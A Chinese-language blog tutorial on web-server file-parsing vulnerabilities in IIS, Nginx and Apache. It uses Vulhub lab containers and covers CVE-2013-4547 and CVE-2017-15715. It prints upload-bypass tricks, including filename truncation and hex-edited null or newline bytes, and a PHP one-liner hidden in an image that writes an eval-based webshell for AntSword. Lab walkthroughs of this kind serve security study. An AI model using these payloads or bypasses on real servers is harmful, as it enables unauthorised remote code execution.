文件解析漏洞

于 2024-07-30 17:37:21 发布
阅读量1k 收藏 25
点赞数 40
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71053667/article/details/140799853
版权

IIS解析漏洞

IIS6.X

环境:windows server 2003

方式一:目录解析

在网站下建立文件夹的名字为 .asp/.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

方式二:畸形文件解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 1.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执行文件除了asp还包含asa\\\\cer\\\\cdx

IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将 **/xx.jpg/xx.php** 解析为 php 文件。

  1. php.ini里的cgi.fix_pathinfo=1 开启
  2. IIS7在Fast-CGI运行模式下

如果是一句话木马,可以使用菜刀连接

Nginx解析漏洞

nginx_parsing

这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将 /xx.jpg/xx.php 解析为 php 文件。

》》》利用条件《《《

  • Nginx <=0.8.37
  • cgi.fix_pathinfo=1

》》》利用姿势《《《

Nginx的文件解析漏洞...和IIS7.0的解析漏洞同样的原理,因为cgi.fix_pathinfo=1造成的解析漏洞...

PS:同样使用1.jpg/.php方式进行绕过...

步骤一:进入以下Vulhub路径并开启容器...

cd /nginx/nginx_parsing_vulnerability
docker-compose build
docker-compose up -d
docker ps -a

步骤二:浏览器中访问网站..

http://124.221.58.83:8088

步骤三:上传以.jpg结尾的文件,访问

》》》GetShell《《《

步骤一:使用winhex工具往正常的图片中写入以下代码..

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

步骤二:上传该图片并访问....紧接着利用解析漏洞执行其中的PHP代码

<http://101.42.118.221/uploadfiles/64c99f2867ba6f0733aba807c66617f7.jpeg/.php>

步骤三:访问同级目录下的shell.php文件页面为空....紧接着使用蚁剑链接...

CVE-2013-4547

此漏洞为文件名逻辑漏洞,该漏洞在上传图片时,修改其16进制编码可使其绕过策略,导致解析为php。当Nginx得到一个用户请求时,首先对url进行解析,进行正则匹配,如果匹配到以.php后缀结尾的文件名,会将请求的PHP文件交给PHP-CGI去解析。

》》》影响版本《《《

  • Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

》》》利用姿势《《《

步骤一:使用以下命令启动靶机并通过浏览器访问靶场页面...

#启动靶场
cd vulhub-master/nginx/CVE-2013-4547              //切换到靶机目录
docker-compose build                              //创建环境
docker-compose up -d                              //打开环境
#靶场页面
<http://124.221.58.83/:8089/>
#info.php
<?php phpinfo();?>

步骤二:抓包直接上传info.php被拦截...修改文件后缀为.jpg进行上传且在后面添加空格;上传成功...

步骤三:在.jpg后面添加两个空格并给上.php后缀,在16进制修改中将原本连个空格的0x20 0x20修改为如下即0x20 0x00进行发包...

改为两个空格

步骤四:访问上传后的文件....由于url会将其编码,需要继续抓包修改0x20 0x200x20 0x00

Apache解析漏洞

apache_parsing

在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。如1.php.xxxxx

》》》漏洞原理《《《

Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如如下配置文件

AddType text/html .html
AddLanguage zh-CN .cn

其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。以上就是Apache多后缀的特性。如果运维人员给.php后缀增加了处理器:

AddHandler application/x-httpd-php .php .php3 .phtml

那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 

》》》利用姿势《《《

步骤一:进入Vulhub靶场并执行以下命令启动靶场...

cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose up -d
docker ps -a

步骤二:访问靶机并上传1.php.jpg文件,上传成功,访问路径,成功

CVE-2017-15715

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个换行解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

》》》影响版本《《《

  • 2.4.0~2.4.29

》》》利用姿势《《《

步骤一:进入Vulhub靶场并开启目标靶机,进行访问...

#启动靶机
cd /Vulnhub/vulhub-master/httpd/CVE-2017-15715
docker-compose up -d
#访问地址
<http://124.221.58.83:8090//>

 步骤二:尝试上传一info文件,发现被拦截...抓包,文件名称后加空格

步骤三:在evil.php文件后面添加空格0x20在改为0x0a再次返送即可上传成功....

步骤四:访问上传的evil文件在后面加上%0a再访问发现解析了其中的PHP代码,但后缀不是php说明存在解析漏洞

发生什么事了318
关注
  • 40
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
七、文件解析漏洞
weixin_45540609的博客
05-03 711
一、原理 平常的一句话木马,后缀是.php,但是有时候任意设置后缀名也可以达到同样的效果,因为大部分中间件都可以配置后缀识别。 上传:把文件上传 解析:把x后缀的文件当做后端脚本执行 IIS => windows server web 容器 asp后缀文件之所以会被当做asp处理,是因为web容器遇到asp文件,它会把该文件交给C:\WINDOWS\system32、inetstrv、asp.DLL执行 windows server 2003 默认使用的IIS6.0,当..
文件解析漏洞大全
scu_hacker博客
01-25 6350
目录 前言 一、apache解析漏洞 二、nginx解析漏洞 2.1nginx<8.03 2.2nginx 0.5,0.6,0.7 <= 0.7.65, 0.8 <= 0.8.37 三、IIS解析漏洞 3.1IIS 5.0/6.0 3.2 IIS 6.0 3.3IIS 7.x 四、windows解析漏洞 4.1​​​​​​​上传jsp%20的文件或者jsp.,windows会删除.和空格 ​​​​​​​4.2上传jsp::DATA文件,windows会...
Web安全—文件上传(解析漏洞
zhdf160916的博客
11-21 6237
教学目标 理解文件上传漏洞原理 掌握几种文件上传绕过方法 一、文件上传漏洞介绍 文件上传:文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,web受攻击的风险就越大。 1、文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(asp、aspx、php、jsp等) 注:asp,aspx对应iis解析 php对应apache解析 jsp对应java(tomcat) 恶意上传行为可能导致网站甚至整个服务器被控制。恶
文件解析漏洞总结
2ed
04-09 542
文件解析漏洞,是指Web容器(Apache、nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件解析。 0x001 IIS解析漏洞 目录解析 在 IIS5.x/6.0 中,在网站下建立文件夹的名字为*.asp、.asa、.cer、*.cdx 的文件夹,其目录内的任何扩展名的文件都被IIS当做asp文件来解释并执行。例如创建目录 test.asp,那么 /test...
Apache文件解析漏洞-01
09-15
Apache文件解析漏洞-01 Apache文件解析漏洞是一种基于Apache服务器的文件解析机制中的漏洞,攻击者可以通过构造特殊的文件名来欺骗Apache服务器,导致服务器错误地解析文件类型,从而导致安全漏洞的出现。 Apache...
IIS6.0文件解析漏洞
龙狼刺的博客
05-11 6297
目录 一、相关知识 1、IIS6.0解析漏洞介绍 2、IIS6.0PUT上传原理 3、IIS6.0解析文件类型 4、IIS6.0文件解析漏洞修复方案 二、环境配置 三、文件上传 1、设置代理 2、靶机环境配置 3、截取数据包 4、探测漏洞 5、创建文件,并写入一句话木马 6、复制文件并重命名,绕过拦截 四、蚁剑连接 一、相关知识 1、IIS6.0解析漏洞介绍 (1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。...
Nginx文件解析漏洞
xdjxi的博客
02-23 1772
1 首先拉取一个基础镜像 docker pull ubuntu:14.04.5 2.启动一个容器 使用docker run -d -it -p本机端口:80 ubuntu:14.04.5启动镜像 3.进入容器 使用docker exec -it [容器ID]/bin/bash进入容器 4 .更换apt源 然后使用以下语句安装相关环境: apt-get update # 更新源 apt-get install vim # 安装vim apt-get install nginx #..
Apache与文件解析漏洞详解
nuanyangH的博客
04-22 1924
1. Apache介绍与服务搭建 1.1. apache介绍 Apache跨平台的纯粹的web服务器,负责接收处理/响应http请求,之所以说它是纯粹的web服务器,是因为apache对于html页面的解析能力很强,但是不能解析嵌入页面内的服务器端脚本代码(如jsp/servlet)。 前面也说了,apache没有办法解析服务器端的脚本代码(此处以php为例),若需要解析.php文件,还需要php...
文件解析漏洞挖掘工具
最新发布
04-25
文件解析漏洞挖掘工具是一种用于发现和利用应用程序中的文件解析漏洞的工具。文件解析漏洞是指应用程序在处理用户上传的文件时,未正确验证和处理文件内容导致的安全漏洞。攻击者可以通过利用这些漏洞来执行任意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值